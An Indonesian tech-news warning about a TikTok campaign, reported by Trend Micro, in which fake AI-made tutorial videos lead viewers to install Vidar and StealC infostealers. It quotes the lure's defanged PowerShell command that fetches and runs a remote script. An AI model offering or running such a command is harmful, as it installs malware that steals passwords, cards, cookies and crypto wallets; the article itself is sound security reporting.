Waspada! Jerat Malware TikTok Berkedok Video Tutorial ‘Sesat’

Perusahaan keamanan siber Trend Micro mengungkap kampanye terbaru penyebaran malware melalui video TikTok yang dikemas sebagai tutorial “edukasi”.

Video-video tersebut menggunakan AI-generated content (suara dan visual) untuk meniru format tutorial resmi, seperti aktivasi WindowsMicrosoft OfficeSpotify, atau CapCut.

Alih-alih memberikan panduan valid, video tersebut menginstruksikan korban menjalankan perintah PowerShell berbahaya yang mengunduh malware Vidar dan StealC.

Salah satu video teridentifikasi telah ditonton 500.000 kali dan mendapat 20.000 likes, menunjukkan tingginya potensi korban.

Akun penyebar malware seperti @gitallowed dan @digitaldreams771 kini telah dinonaktifkan oleh TikTok 1218.

Modus Operandi: Social Engineering Canggih

Berbeda dari metode lama yang menyematkan tautan di deskripsi, pelaku memanfaatkan verbal instruction dalam video untuk menghindari deteksi algoritma keamanan.

Berikut tahapan penipuan:

  1. Pengguna diinstruksikan menekan Windows + R dan memasukkan perintah iex (irm hxxps://allaivo[.]me/spotify) via PowerShell.
  2. Perintah tersebut mengunduh skrip jahat yang menciptakan folder tersembunyi di AppData/LocalAppData dan menonaktifkan Windows Defender.
  3. Malware Vidar/StealC terinstal, mencuri data sensitif seperti:  Password dan info login, Data kartu kredit, Cookie browser, Informasi dompet kripto dan Kode autentikasi dua faktor (2FA).
  • Related Posts

    Layanan WorldCoin Dibekukan, World Tak Lagi Beroperasi di Indonesia

    Kementerian Komunikasi dan Digital (Komdigi) membekukan sementara Tanda Daftar Penyelenggara Sistem Elektronik (TDPSE) layanan Worldcoin dan WorldID. Menanggapi hal ini, Tools of Humanity (TFH), perusahaan atau pengembang proyek World, telah…

    Komdigi Dominasi PNBP K/L Kuartal I-2025 dengan Rp3,25 Triliun

    Kementerian Komunikasi dan Digital (Kemkomdigi) menorehkan capaian signifikan pada awal 2025 dengan menjadi kementerian penyumbang Penerimaan Negara Bukan Pajak (PNBP) terbesar selama kuartal I. Kontribusinya mencapai Rp3,25 triliun, mengungguli kementerian…

    Leave a Reply

    Your email address will not be published. Required fields are marked *

    You Missed

    Layanan WorldCoin Dibekukan, World Tak Lagi Beroperasi di Indonesia

    Komdigi Dominasi PNBP K/L Kuartal I-2025 dengan Rp3,25 Triliun

    Cara Membuat Fitur AI Alive di Tiktok, Foto Jadi Lebih Hidup

    OpenAI Caplok Startup Milik Jony Ive Senilai Rp104 Triliun

    Data Center Pertama Microsoft di Indonesia Resmi Dibuka

    Meta Berencana Gelontorkan Dana US$10 Miliar pada Startup Scale AI